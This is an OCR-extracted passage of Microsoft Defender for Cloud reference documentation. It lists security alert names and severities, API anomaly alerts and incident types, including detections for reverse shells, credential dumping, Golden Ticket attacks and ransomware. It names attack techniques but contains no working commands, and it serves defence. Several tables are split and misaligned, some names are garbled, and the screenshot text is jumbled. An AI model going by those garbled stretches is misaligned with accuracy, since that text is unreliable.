
Possible exploitation of Hadoop Yarn 

A history file has been cleared 

Possible attack tool detected 

Possible credential access tool detected 
Indicators associated with DDOS toolkit detected 
Screenshot taken on host 

Possible backdoor detected 

Local host reconnaissance detected 

Script extension mismatch detected 

MITRE Caldera agent detected 

Detected Persistence Attempt 

Account added to sudo group 

Potential overriding of common files 

Container running in privileged mode 

Command within a container running with high privileges 
Unusual access to bash history file 


Potential reverse shell detected 


Process seen accessing the SSH authorized keys file in an unusual way 


New SSH key added 

Suspicious compilation detected 

An uncommon connection attempt detected 

Detected file download from a known malicious source 
Detected suspicious file download 

Executable found running from a suspicious location 
Access of htaccess file detected 

Suspicious first command in shell 


Detected anomalous mix of uppercase and lowercase characters in 
command line 


Suspicious network connection 

Detected suspicious use of the nohup command 
Possible password change using crypt-method detected 
Suspicious password access 

Suspicious PHP execution detected 

Potential port forwarding to external IP address 


Process running in a service account became root unexpectedly 


Severity 
Medium 
Medium 
Medium 


Medium 


Medium 


Low 


Medium 


Medium 


Medium 


Medium 


Medium 


Low 


Medium 


Low 


Low 


Informational 


Medium 


Low 


Low 


Medium 


Medium 


Medium 


Low 


Medium 


Medium 


Low 


Medium 


Informational 


Medium 


Medium 


Informational 


Medium 


Medium 


Medium 


Alert Type Alert Display Name 
VM_SuspectProcessTermination 
VM_SuspectUserAddition 
VM_SuspiciousCommandLineExecution 
VM_SuspiciousDNSOverHttps 
VM_SystemLogRemoval 
VM_ThreatIntelCommandLineSuspectDomain 
VM_ThreatIntelSuspectLogon 
VM_TimerServiceDisabled 


VM_TimestampTampering 


VM_Webshell 


Deprecated Windows alerts 


Alert Type 
SCUBA_MULTIPLEACCOUNTCREATE 
SCUBA_PSINSIGHT_CONTEXT 


SCUBA_RULE_AddGuestToAdministrators 


SCUBA_RULE_Apache_Tomcat_executing_suspicious_commands 
SCUBA_RULE_KnownBruteForcingTools 
SCUBA_RULE_KnownCollectionTools 
SCUBA_RULE_KnownDefenseEvasionTools 
SCUBA_RULE_KnownExecutionTools 
SCUBA_RULE_KnownPassTheHashTools 
SCUBA_RULE_KnownSpammingTools 
SCUBA_RULE_Lowering_Security_Settings 
SCUBA_RULE_OtherKnownHackerTools 
SCUBA_RULE_RDP_session_hijacking_via_tscon 
SCUBA_RULE_RDP_session_hijacking_via_tscon_service 


SCUBA_RULE_Suppress_pesky_unauthorized_use_prohibited_notices 
SCUBA_RULE_WDigest_Enabling 


VM.Windows_ApplockerBypass 
VM.Windows_BariumKnownSuspiciousProcessExecution 


VM.Windows_Base64EncodedExecutablelnCommandLineParams 


Security-related process termination detected 

Detected suspicious use of the useradd command 

Suspicious command execution 

Suspicious use of DNS over HTTPS 

Possible Log Tampering Activity Detected 

A possible connection to malicious location has been detected 
A logon from a malicious IP has been detected 

Attempt to stop apt-daily-upgrade.timer service detected 
Suspicious file timestamp modification 


Possible malicious web shell detected 


Alert Display Name 


Suspicious creation of accounts on multiple hosts 


Suspicious use of PowerShell detected 


Addition of Guest account to Local 
Administrators group 


Apache_Tomcat_executing_suspicious_commands 


Suspicious process executed 
Suspicious process executed 
Suspicious process executed 
Suspicious process executed 


Suspicious process executed 


Suspicious process executed 
Detected the disabling of critical services 


Suspicious process executed 


Suspect integrity level indicative of RDP hijacking 


Suspect service installation 


Detected suppression of legal notice displayed to 


users at logon 


Detected enabling of the WDigest 
UseLogonCredential registry key 


Potential attempt to bypass AppLocker detected 


Detected suspicious file creation 


Detected encoded executable in command line 
data 


Severity 

Low 

Medium 
High 
Medium 
Medium 
Medium 
High 
Informational 
Low 


Medium 


Severity 
Medium 
Informational 


Medium 


Medium 
High 
High 
High 


High 


High 
Medium 
Medium 
High 
Medium 
Medium 


Low 


Medium 


High 
High 


High 


Alert Type 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


VM.Wi 


ndows_CalcsCommandLineUse 


ndows_CommandLineStartingAllExe 


ndows_DisablingAndDeletinglISLogFiles 


ndows_DownloadUsingCertutil 


ndows_EchoOverPipeOnLocalhost 


ndows_EchoToConstructPowerShellScript 


ndows_ExecutableDecodedUsingCertutil 


ndows_FileDeletionlsSospisiousLocation 


ndows_KerberosGoldenTicketAttack 


ndows_KeygenToolKnownProcessName 


ndows_KnownCredentialAccess Tools 
ndows_KnownSuspiciousPowerShellScript 
ndows_KnownSuspiciousSoftwarelnstallation 


ndows_MsHtaAndPowerShellCombination 


ndows_MultipleAccountsQuery 
ndows_NewAccountCreation 
ndows_ObfuscatedCommandLine 


ndows_PcaluaUseToLaunchExecutable 


ndows_PetyaRansomware 
ndows_PowerShellPowerSploitScriptExecution 
ndows_Ransomwarelndication 


ndows_SqlIDumperUsedSuspiciously 


ndows_StopCriticalServices 


ndows_SubvertingAccessibilityBinary 


ndows_SuspiciousAccountCreation 
ndows_SuspiciousFirewallRuleAdded 
ndows_SuspiciousFTPSSwitchUsage 
ndows_SuspiciousSQLActivity 


ndows_SVCHostFrominvalidPath 


Alert Display Name 


Detected suspicious use of Cacls to lower the 
security state of the system 


Detected suspicious command line used to start 
all executables in a directory 


Detected actions indicative of disabling and 
deleting IIS log files 


Suspicious download using Certutil detected 


Detected suspicious named pipe 
communications 


Dynamic PowerShell script construction 


Detected decoding of an executable using built- 
in certutil.exe tool 


Suspicious file deletion detected 


Suspected Kerberos Golden Ticket attack 
parameters observed 


Detected possible execution of keygen 
executable Suspicious process executed 


Suspicious process executed 
Suspicious use of PowerShell detected 
High risk software detected 


Detected suspicious combination of HTA and 
PowerShell 


Multiple Domain Accounts Queried 
Account creation detected 
Detected obfuscated command line. 


Detected suspicious use of Pcalua.exe to launch 
executable code 


Detected Petya ransomware indicators 
Suspicious PowerShell cmdlets executed 
Ransomware indicators detected 


Possible credential dumping detected [seen 
multiple times] 


Detected the disabling of critical services 


Sticky keys attack detected 
Suspicious account creation detected Medium 


Suspicious Account Creation Detected 
Detected suspicious new firewall rule 
Detected suspicious use of FTP -s switch 
Suspicious SQL activity 


Suspicious process executed 


Severity 


Medium 


Medium 


Medium 


Medium 


High 


Medium 


Medium 


Medium 


Medium 


Medium 


High 
High 
Medium 


Medium 


Medium 
Informational 
High 


Medium 


High 
Medium 
High 


Medium 


Medium 


Medium 
Medium 
Medium 
Medium 


High 


Alert Type 
VM.Windows_SystemEventLogCleared 


VM.Windows_TelegramInstallation 


VM.Windows_UndercoverProcess 


VM.Windows_UserAccountControlBypass 


VM.Windows_VBScriptEncoding 


VM.Windows_WindowPositionRegisteryChange 


VM.Windows_ZincPortOpenningUsingFirewallRule 


VM_DigitalCurrencyMining 
VM_MaliciousSQLActivity 
VM_ProcessWithDoubleExtensionExecution 
VM_RegistryPersistencyKey 


VM_ShadowCopyDeletion 


VM_SuspectExecutablePath 


VM_SuspectPhp 
VML_SuspiciousCommandLineExecution 
VM_SuspiciousScreenSaverExecution 
VM_SvcHostRunInRareServiceGroup 
VM_SystemProcessInAbnormalContext 


VM_ThreatIntelCommandLineSuspectDomain 


VM_ThreatintelSuspectLogon 


VM_VbScriptHttpObjectAllocation 


Alert Display Name 
The Windows Security log was cleared 


Detected potentially suspicious use of Telegram 
tool 


Suspiciously named process detected 


Detected change to a registry key that can be 
abused to bypass UAC 


Detected suspicious execution of 
VBScript.Encode command 


Suspicious WindowPosition registry value 
detected 


Malicious firewall rule created by ZINC server 
implant 


Digital currency mining related behavior detected 
Malicious SQL activity 

Suspicious double extension file executed 
Windows registry persistence method detected 


Suspicious Volume Shadow Copy Activity 
Executable found running from a suspicious 
location 


Executable found running from a suspicious 
location 

Detected anomalous mix of uppercase and 
lowercase characters in command line 


Suspicious PHP execution detected 
Suspicious command execution 
Suspicious Screensaver process executed 
Rare SVCHOST service group executed 
Suspicious system process executed 


A possible connection to malicious location has 
been detected 


A logon from a malicious IP has been detected 


VBScript HTTP object allocation detected 


Alerts for Defender for APIs 


Alert (alert type) Description MITRE 
tactics 
(Preview) Suspicious population-level A suspicious spike in API traffic was detected at one of the API Impact 


spike in API traffic to an API endpoint endpoints. The detection system used historical traffic patterns to 
(API_PopulationSpikelnAPITraffic) establish a baseline for routine API traffic volume between all IPs and 
the endpoint, with the baseline being specific to API traffic for each 
status code (such as 200 Success). The detection system flagged an 
unusual deviation from this baseline leading to the detection of 


suspicious activity. 


Severity 
Informational 


Medium 


High 


Medium 


Medium 


Low 


Informational 


Medium 


Medium 

High 
Medium 
Informational 
Medium 


Medium 


High 


High 


Severity 


Medium 


Alert (alert type) 


(Preview) Suspicious spike in API 
traffic from a single IP address to an 
API endpoint 

(API_SpikelnAPITraffic) 


(Preview) Unusually large response 
payload transmitted between a single 
IP address and an API endpoint 
(API_SpikelnPayload) 


(Preview) Unusually large request 
body transmitted between a single IP 
address and an API endpoint 
(API_SpikelnPayload) 


(Preview) Suspicious spike in latency 
for traffic between a single IP address 
and an API endpoint 
(API_SpikelnLatency) 


(Preview) API requests spray from a 
single IP address to an unusually large 
number of distinct API endpoints 
(API_SpraylnRequests) 


(Preview) Parameter enumeration on 
an API endpoint 
(API_ParameterEnumeration) 


(Preview) Distributed parameter 
enumeration on an API endpoint 
(API_DistributedParameterEnumeration) 


Description 


A suspicious spike in API traffic was detected from a client IP to the 
API endpoint. The detection system used historical traffic patterns to 
establish a baseline for routine API traffic volume to the endpoint 
coming from a specific IP to the endpoint. The detection system 
flagged an unusual deviation from this baseline leading to the 
detection of suspicious activity. 


A suspicious spike in API response payload size was observed for 
traffic between a single IP and one of the API endpoints. Based on 
historical traffic patterns from the last 30 days, Defender for APIs 
learns a baseline that represents the typical API response payload 
size between a specific IP and API endpoint. The learned baseline is 
specific to API traffic for each status code (e.g., 200 Success). The 
alert was triggered because an API response payload size deviated 
significantly from the historical baseline. 


A suspicious spike in API request body size was observed for traffic 
between a single IP and one of the API endpoints. Based on historical 
traffic patterns from the last 30 days, Defender for APIs learns a 
baseline that represents the typical API request body size between a 
specific IP and API endpoint. The learned baseline is specific to API 
traffic for each status code (e.g., 200 Success). The alert was triggered 
because an API request size deviated significantly from the historical 
baseline. 


A suspicious spike in latency was observed for traffic between a 
single IP and one of the API endpoints. Based on historical traffic 
patterns from the last 30 days, Defender for APIs learns a baseline 
that represents the routine API traffic latency between a specific IP 
and API endpoint. The learned baseline is specific to API traffic for 
each status code (e.g., 200 Success). The alert was triggered because 
an API call latency deviated significantly from the historical baseline. 


A single IP was observed making API calls to an unusually large 
number of distinct endpoints. Based on historical traffic patterns 
from the last 30 days, Defenders for APIs learns a baseline that 
represents the typical number of distinct endpoints called by a single 
IP across 20-minute windows. The alert was triggered because a 
single IP's behavior deviated significantly from the historical baseline. 


A single IP was observed enumerating parameters when accessing 
one of the API endpoints. Based on historical traffic patterns from the 
last 30 days, Defender for APIs learns a baseline that represents the 
typical number of distinct parameter values used by a single IP when 
accessing this endpoint across 20-minute windows. The alert was 
triggered because a single client IP recently accessed an endpoint 
using an unusually large number of distinct parameter values. 


The aggregate user population (all IPs) was observed enumerating 
parameters when accessing one of the API endpoints. Based on 
historical traffic patterns from the last 30 days, Defender for APIs 
learns a baseline that represents the typical number of distinct 
parameter values used by the user population (all IPs) when 
accessing an endpoint across 20-minute windows. The alert was 
triggered because the user population recently accessed an endpoint 
using an unusually large number of distinct parameter values. 


MITRE Severity 
tactics 
Impact Medium 
Initial Medium 
access 
Initial Medium 
access 
Initial Medium 
access 


Discovery Medium 


Initial Medium 
access 
Initial Medium 
access 


Alert (alert type) 


(Preview) Parameter value(s) with 
anomalous data types in an API call 
(API_UnseenParamType) 


(Preview) Previously unseen 
parameter used in an API call 
(API_UnseenParam) 


(Preview) Access from a Tor exit node 
to an API endpoint 
(API_AccessFromTorExitNode) 


(Preview) API Endpoint access from 
suspicious IP 
(API_AccessFromSuspiciousIP) 


(Preview) Suspicious User Agent 
detected 
(API_AccessFromSuspiciousUserAgent) 


Next steps 


MITRE 
tactics 


Description 


A single IP was observed accessing one of your API endpoints and 
using parameter values of a low probability data type (e.g., string, 


Impact 


integer, etc.). Based on historical traffic patterns from the last 30 
days, Defender for APIs learns the expected data types for each API 
parameter. The alert was triggered because an IP recently accessed 
an endpoint using a previously low probability data type as a 
parameter input. 


A single IP was observed accessing one of the API endpoints using a Impact 
previously unseen or out-of-bounds parameter in the request. Based 

on historical traffic patterns from the last 30 days, Defender for APIs 

learns a set of expected parameters associated with calls to an 

endpoint. The alert was triggered because an IP recently accessed an 


endpoint using a previously unseen parameter. 


Pre- 
attack 


An IP address from the Tor network accessed one of your API 
endpoints. Tor is a network that allows people to access the Internet 
while keeping their real IP hidden. Though there are legitimate uses, 
it is frequently used by attackers to hide their identity when they 
target people's systems online. 


Pre- 
attack 


An IP address accessing one of your API endpoints was identified by 
Microsoft Threat Intelligence as having a high probability of being a 
threat. While observing malicious Internet traffic, this IP came up as 

involved in attacking other online targets. 


The user agent of a request accessing one of your API endpoints Execution 
contained anomalous values indicative of an attempt at remote code 

execution. This does not mean that any of your API endpoints have 

been breached, but it does suggest that an attempted attack is 


underway. 


e Security alerts in Microsoft Defender for Cloud 


e Manage and respond to security alerts in Microsoft Defender for Cloud 


e Continuously export Defender for Cloud data 


Severity 


Medium 


Medium 


Medium 


High 


Medium 


Incidents - a reference guide 


Article e 10/15/2023 


© Note 


For incidents that are in preview: The Azure Preview Supplemental Terms include 
additional legal terms that apply to Azure features that are in beta, preview, or 
otherwise not yet released into general availability. 


This article lists the incidents you might get from Microsoft Defender for Cloud and any 
Microsoft Defender plans you've enabled. The incidents shown in your environment 
depend on the resources and services you're protecting, and your customized 
configuration. 


A security incident is a correlation of alerts with an attack story that share an entity. For 
example, Resource, IP Address, User or share a kill chain pattern. 


You can select an incident to view all of the alerts that are related to the incident and get 
more information. 


Learn how to manage security incidents. 


O Note 


The same alert can exist as part of an incident, as well as to be visible as a 
standalone alert. 


Security incident 


Further details and notes 


Alert Description Severity 
Security incident This incident indicates suspicious activity on your virtual Medium/High 
detected suspicious machines. Multiple alerts from different Defender for 

virtual machines Cloud plans have been triggered revealing a similar 

activity pattern on your virtual machines. This might indicate a 


threat actor has gained unauthorized access to your 
environment and is attempting to compromise it. 


Alert 


Security incident 
detected suspicious 
source IP activity 


Security incident 
detected on 
multiple resources 


Security incident 
detected suspicious 
user activity 
(Preview) 


Security incident 
detected suspicious 
service principal 
activity (Preview) 


Security incident 
detected suspicious 
crypto mining 
activity (Preview) 


Description 


This incident indicates that suspicious activity has been 
detected on the same source IP. Multiple alerts from 
different Defender for Cloud plans have been triggered on 
the same IP address, which increases the fidelity of 
malicious activity in your environment. Suspicious activity 
on the same IP address might indicate that an attacker has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


This incident indicates that suspicious activity had been 
detected on your cloud resources. Multiple alerts from 
different Defender for Cloud plan have been triggered, 
revealing similar attack methods were performed on your 
cloud resources. This might indicate a threat actor has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


This incident indicates suspicious user operations in your 
environment. Multiple alerts from different Defender for 
Cloud plans have been triggered by this user, which 
increases the fidelity of malicious activity in your 
environment. While this activity may be legitimate, a 
threat actor might utilize such operations to compromise 
resources in your environment. This might indicate that 
the account is compromised and is being used with 
malicious intent. 


This incident indicates suspicious service principal 
operations in your environment. Multiple alerts from 
different Defender for Cloud plans have been triggered by 
this service principal, which increases the fidelity of 
malicious activity in your environment. While this activity 
may be legitimate, a threat actor might utilize such 
operations to compromise resources in your environment. 
This might indicate that the service principal is 
compromised and is being used with malicious intent. 


Scenario 1: This incident indicates that suspicious crypto 
mining activity has been detected following suspicious 
user or service principal activity. Multiple alerts from 
different Defender for Cloud plans have been triggered on 
the same resource, which increases the fidelity of 
malicious activity in your environment. Suspicious account 
activity might indicate a threat actor gained unauthorized 
access to your environment, and the succeeding crypto 
mining activity may suggest that they successfully 
compromised your resource and are using it for mining 
cryptocurrencies, which can lead to increased costs for 


Severity 


Medium/High 


Medium/High 


High 


High 


High 


Alert 


Security incident 
detected suspicious 
Key Vault activity 
(Preview) 


Description 


your organization. 


Scenario 2: This incident indicates that suspicious crypto 
mining activity has been detected following a brute force 
attack on the same virtual machine resource. Multiple 
alerts from different Defender for Cloud plans have been 
triggered on the same resource, which increases the 
fidelity of malicious activity in your environment. The 
brute force attack on the virtual machine might indicate 
that a threat actor is attempting to gain unauthorized 
access to your environment, and the succeeding crypto 
mining activity may suggest they successfully 
compromised your resource and using it for mining 
cryptocurrencies, which can lead to increased costs for 
your organization. 


Scenario 1: This incident indicates that suspicious activity 
has been detected in your environment related to the 
usage of Key Vault. Multiple alerts from different Defender 
for Cloud plans have been triggered by this user or service 
principal, which increases the fidelity of malicious activity 
in your environment. Suspicious Key Vault activity might 
indicate that a threat actor is attempting to gain access to 
your sensitive data, such as keys, secrets, and certificates, 
and the account is compromised and is being used with 
malicious intent. 


Scenario 2: This incident indicates that suspicious activity 
has been detected in your environment related to the 
usage of Key Vault. Multiple alerts from different Defender 
for Cloud plans have been triggered from the same IP 
address, which increases the fidelity of malicious activity in 
your environment. Suspicious Key Vault activity might 
indicate that a threat actor is attempting to gain access to 
your sensitive data, such as keys, secrets, and certificates, 
and the account is compromised and is being used with 
malicious intent. 


Scenario 3: This incident indicates that suspicious activity 
has been detected in your environment related to the 
usage of Key Vault. Multiple alerts from different Defender 
for Cloud plans have been triggered on the same 
resource, which increases the fidelity of malicious activity 
in your environment. Suspicious Key Vault activity might 
indicate that a threat actor is attempting to gain access to 
your sensitive data, such as keys, secrets, and certificates, 


Severity 


High 


Alert 


Security incident 
detected suspicious 
SAS activity 
(Preview) 


Security incident 
detected 
anomalous 
geographical 
location activity 
(Preview) 


Security incident 
detected suspicious 
IP activity (Preview) 


Description 


and the account is compromised and is being used with 
malicious intent. 


This incident indicates that suspicious activity has been 
detected following the potential misuse of a SAS token. 
Multiple alerts from different Defender for Cloud plans 
have been triggered on the same resource, which 
increases the fidelity of malicious activity in your 
environment. The usage of a SAS token can indicate that a 
threat actor has gained unauthorized access to your 
storage account and is attempting to access or exfiltrate 
sensitive data. 


Scenario 1: This incident indicates that anomalous 
geographical location activity has been detected in your 
environment. Multiple alerts from different Defender for 
Cloud plans have been triggered on the same resource, 
which increases the fidelity of malicious activity in your 
environment. Suspicious activity originating from 
anomalous locations might indicate that a threat actor 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 2: This incident indicates that anomalous 
geographical location activity has been detected in your 
environment. Multiple alerts from different Defender for 
Cloud plans have been triggered from the same IP 
address, which increases the fidelity of malicious activity in 
your environment. Suspicious activity originating from 
anomalous locations might indicate that a threat actor 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 1: This incident indicates that suspicious activity 
has been detected originating from a suspicious IP 
address. Multiple alerts from different Defender for Cloud 
plans have been triggered from the same IP address, 
which increases the fidelity of malicious activity in your 
environment. Suspicious activity originating from a 
suspicious IP address might indicate that an attacker has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 2: This incident indicates that suspicious activity 
has been detected originating from a suspicious IP 
address. Multiple alerts from different Defender for Cloud 
plans have been triggered on the same user or service 
principal, which increases the fidelity of malicious activity 


Severity 


High 


High 


High 


Alert 


Security incident 
detected suspicious 
fileless attack 
activity (Preview) 


Security incident 
detected suspicious 
DDOS activity 
(Preview) 


Security incident 
detected suspicious 
data exfiltration 
activity (Preview) 


Description 


in your environment. Suspicious activity originating from a 
suspicious IP address can indicate that an attacker has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


This incident indicates that a fileless attack toolkit has 
been detected on a virtual machine following a potential 
exploit attempt on the same resource. Multiple alerts from 
different Defender for Cloud plans have been triggered on 
the same virtual machine, which increases the fidelity of 
malicious activity in your environment. The presence of a 
fileless attack toolkit on the virtual machine might indicate 
that a threat actor has gained unauthorized access to your 
environment and is attempting to evade detection while 
carrying out further malicious activities. 


This incident indicates that suspicious Distributed Denial 
of Service (DDOS) activity has been detected in your 
environment. DDOS attacks are designed to overwhelm 
your network or application with a high volume of traffic, 
causing it to become unavailable to legitimate users. 
Multiple alerts from different Defender for Cloud plans 
have been triggered on the same IP address, which 
increases the fidelity of malicious activity in your 
environment. 


Scenario 1: This incident indicates that suspicious data 
exfiltration activity has been detected following suspicious 
user or service principal activity. Multiple alerts from 
different Defender for Cloud plans have been triggered on 
the same resource, which increases the fidelity of 
malicious activity in your environment. Suspicious account 
activity might indicate that a threat actor gained 
unauthorized access to your environment, and the 
succeeding data exfiltration activity may suggest that they 
are attempting to steal sensitive information. 


Scenario 2: This incident indicates that suspicious data 
exfiltration activity has been detected following suspicious 
user or service principal activity. Multiple alerts from 
different Defender for Cloud plans have been triggered 
from the same IP address, which increases the fidelity of 
malicious activity in your environment. Suspicious account 
activity might indicate that a threat actor gained 
unauthorized access to your environment, and the 
succeeding data exfiltration activity may suggest that they 
are attempting to steal sensitive information. 


Severity 


High 


High 


High 


Alert 


Security incident 
detected suspicious 
API activity 
(Preview) 


Security incident 
detected suspicious 
Kubernetes cluster 
activity (Preview) 


Security incident 
detected suspicious 
storage activity 
(Preview) 


Description 


Scenario 3: This incident indicates that suspicious data 
exfiltration activity has been detected following unusual 
password reset on a virtual machine. Multiple alerts from 
different Defender for Cloud plans have been triggered 
from the same IP address, which increases the fidelity of 
malicious activity in your environment. Suspicious account 
activity might indicate that a threat actor gained 
unauthorized access to your environment, and the 
succeeding data exfiltration activity may suggest that they 
are attempting to steal sensitive information. 


This incident indicates that suspicious API activity has 
been detected. Multiple alerts from Defender for Cloud 
have been triggered on the same resource, which 
increases the fidelity of malicious activity in your 
environment. Suspicious API usage might indicate that a 
threat actor is attempting to access sensitive information 
or execute unauthorized actions. 


This incident indicates that suspicious activity has been 
detected on your Kubernetes cluster following suspicious 
user activity. Multiple alerts from different Defender for 
Cloud plans have been triggered on the same cluster, 
which increases the fidelity of malicious activity in your 
environment. The suspicious activity on your Kubernetes 
cluster might indicate that a threat actor has gained 
unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 1: This incident indicates that suspicious storage 
activity has been detected following suspicious user or 
service principal activity. Multiple alerts from different 
Defender for Cloud plans have been triggered on the 
same resource, which increases the fidelity of malicious 
activity in your environment. Suspicious account activity 
might indicate that a threat actor gained unauthorized 
access to your environment, and the succeeding 
suspicious storage activity may suggest they are 
attempting to access potentially sensitive data. 


Scenario 2: This incident indicates that suspicious storage 
activity has been detected following suspicious user or 
service principal activity. Multiple alerts from different 
Defender for Cloud plans have been triggered from the 
same IP address, which increases the fidelity of malicious 
activity in your environment. Suspicious account activity 
might indicate that a threat actor gained unauthorized 
access to your environment, and the succeeding 


Severity 


High 


High 


High 


Alert 


Security incident 
detected suspicious 
Azure toolkit 
activity (Preview) 


Security incident 
detected suspicious 
DNS activity 
(Preview) 


Security incident 
detected suspicious 
SQL activity 
(Preview) 


Security incident 
detected suspicious 


Description 


suspicious storage activity may suggest they are 
attempting to access potentially sensitive data. 


This incident indicates that suspicious activity has been 
detected following the potential usage of an Azure toolkit. 
Multiple alerts from different Defender for Cloud plans 
have been triggered on the same user or service principal, 
which increases the fidelity of malicious activity in your 
environment. The usage of an Azure toolkit can indicate 
that an attacker has gained unauthorized access to your 
environment and is attempting to compromise it. 


Scenario 1: This incident indicates that suspicious DNS 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered on the 
same resource, which increases the fidelity of malicious 
activity in your environment. Suspicious DNS activity 
might indicate that a threat actor gained unauthorized 
access to your environment and is attempting to 
compromise it. 


Scenario 2: This incident indicates that suspicious DNS 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered from the 
same IP address, which increases the fidelity of malicious 
activity in your environment. Suspicious DNS activity 
might indicate that a threat actor gained unauthorized 
access to your environment and is attempting to 
compromise it. 


Scenario 1: This incident indicates that suspicious SQL 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered from the 
same IP address, which increases the fidelity of malicious 
activity in your environment. Suspicious SQL activity might 
indicate that a threat actor is targeting your SQL server 
and is attempting to compromise it. 


Scenario 2: This incident indicates that suspicious SQL 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered on the 
same resource, which increases the fidelity of malicious 
activity in your environment. Suspicious SQL activity might 
indicate that a threat actor is targeting your SQL server 
and is attempting to compromise it. 


Scenario 1: This incident indicates that suspicious activity 
has been detected in your app service environment. 


Severity 


High 


Medium 


High 


High 


Alert 


app service activity 
(Preview) 


Security incident 
detected 
compromised 
machine 


Security incident 
detected 
compromised 
machine with 
botnet 
communication 


Security incident 
detected 
compromised 
machines with 
botnet 
communication 


Security incident 
detected 
compromised 
machine with 
malicious outgoing 
activity 


Description Severity 


Multiple alerts from different Defender for Cloud plans 
have been triggered on the same resource, which 
increases the fidelity of malicious activity in your 
environment. Suspicious app service activity might 
indicate that a threat actor is targeting your application 
and may be attempting to compromise it. 


Scenario 2: This incident indicates that suspicious activity 
has been detected in your app service environment. 
Multiple alerts from different Defender for Cloud plans 
have been triggered from the same IP address, which 
increases the fidelity of malicious activity in your 
environment. Suspicious app service activity might 
indicate that a threat actor is targeting your application 
and may be attempting to compromise it. 


This incident indicates suspicious activity on one or more Medium/High 
of your virtual machines. Multiple alerts from different 

Defender for Cloud plans have been triggered in 

chronological order on the same resource, following the 

MITRE ATT&CK framework. This might indicate a threat 

actor has gained unauthorized access to your 


environment and successfully compromised this machine. 


This incident indicates suspicious botnet activity on your Medium/High 
virtual machine. Multiple alerts from different Defender for 

Cloud plans have been triggered in chronological order 

on the same resource, following the MITRE ATT&CK 

framework. This might indicate a threat actor has gained 

unauthorized access to your environment and is 


attempting to compromise it. 


This incident indicates suspicious botnet activity on your Medium/High 
virtual machines. Multiple alerts from different Defender 

for Cloud plans have been triggered in chronological 

order on the same resource, following the MITRE ATT&CK 

framework. This might indicate a threat actor has gained 

unauthorized access to your environment and is 


attempting to compromise it. 


This incident indicates suspicious outgoing activity on Medium/High 
your virtual machine. Multiple alerts from different 

Defender for Cloud plans have been triggered in 

chronological order on the same resource, following the 

MITRE ATT&CK framework. This might indicate a threat 

actor has gained unauthorized access to your 


environment and is attempting to compromise it. 


Alert 


Security incident 
detected 
compromised 
machines 


Security incident 
detected 
compromised 
machines with 
malicious outgoing 
activity 


Security incident 
detected on 
multiple machines 


Security incident 
with shared process 
detected 


Next steps 


Description 


This incident indicates suspicious activity on one or more 
of your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resources, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and successfully compromised these 
machines. 


This incident indicates suspicious outgoing activity from 
your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resources, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and is attempting to compromise it. 


This incident indicates suspicious activity on one or more 
of your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resource, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and is attempting to compromise it. 


Scenario 1: This incident indicates suspicious activity on 
your virtual machine. Multiple alerts from different 
Defender for Cloud plans have been triggered sharing the 
same process. This might indicate a threat actor has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 2: This incident indicates suspicious activity on 
your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered sharing the 
same process. This might indicate a threat actor has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Manage security incidents in Microsoft Defender for Cloud 


Severity 


Medium/High 


Medium/High 


Medium/High 


Medium/High 


Create rich, interactive reports of 
Defender for Cloud data 


Article e 03/14/2023 


Azure Workbooks provide a flexible canvas for data analysis and the creation of rich 
visual reports within the Azure portal. They allow you to tap into multiple data sources 


from across Azure, and combine them into unified interactive experiences. 


Workbooks provide a rich set of capabilities for visualizing your Azure data. For detailed 
examples of each visualization type, see the visualizations examples and documentation. 


Within Microsoft Defender for Cloud, you can access the built-in workbooks to track 
your organization's security posture. You can also build custom workbooks to view a 
wide range of data from Defender for Cloud or other supported data sources. 


Microsoft Defender for Cloud | Workbooks | Secure Score Over Time d x 


64 subscriptions 


@ workbooks Edit Oa? © 2 Help 


Y= Top recommendations with recent increase in unhealthy resources | Security controls scores over time (weekly) 


Recommendations with the most resources that have become unhealthy in the 
periods shown 


B Enable MFA 


| Ze in transit 


D Secure\_fenagement... 


Recommendation name Ty Unhealthy count Ty 


Storage accounts should use customer-managed key (CMK) for 45 


ea 
Storage accounts should restrict network access using virtual ne 45 H Restrict unauthorize... 
SSS 


B Apply system updates 


Storage account should use a private link connection 45 

a 5 D Enable endpoint pro... 
Storage account public access should be disallowed 42 = Hi Apply adaptive appli... 
Access to storage accounts with firewall and virtual network con 41 bo E Remediate security c... 


E Manage access and... 


B Enable auditing and .. 


es 
7 ara 
M 30% 
Disk encryption should be applied on virtual machines 32 20% D Protect your applicat.. 
—— 
E Re vul l... 
Vulnerabilities in security configuration on your machines shouk 27 10% D Remediate vulnerabil 
Ere 
B Enable encryption at.. 
20 o% 
Edi 


Audit diagnostic setting 


Windows web servers should be configured to use secure comn 37 


Feb9 Feb 11 Feb 13 Feb 15 Feb17 Feb19 
Log Analytics agent health issues should be resolved on your m: 19 
ereak Enable MPA (Last) Encrypt data in transit (Last) Secure management port. Restrict unauthorized net 
100« 65.958 = 81.413 = 90.834« 


For pricing, check out the pricing page”. 


Prerequisites 


Required roles and permissions: To save workbooks, you must have at least Workbook 
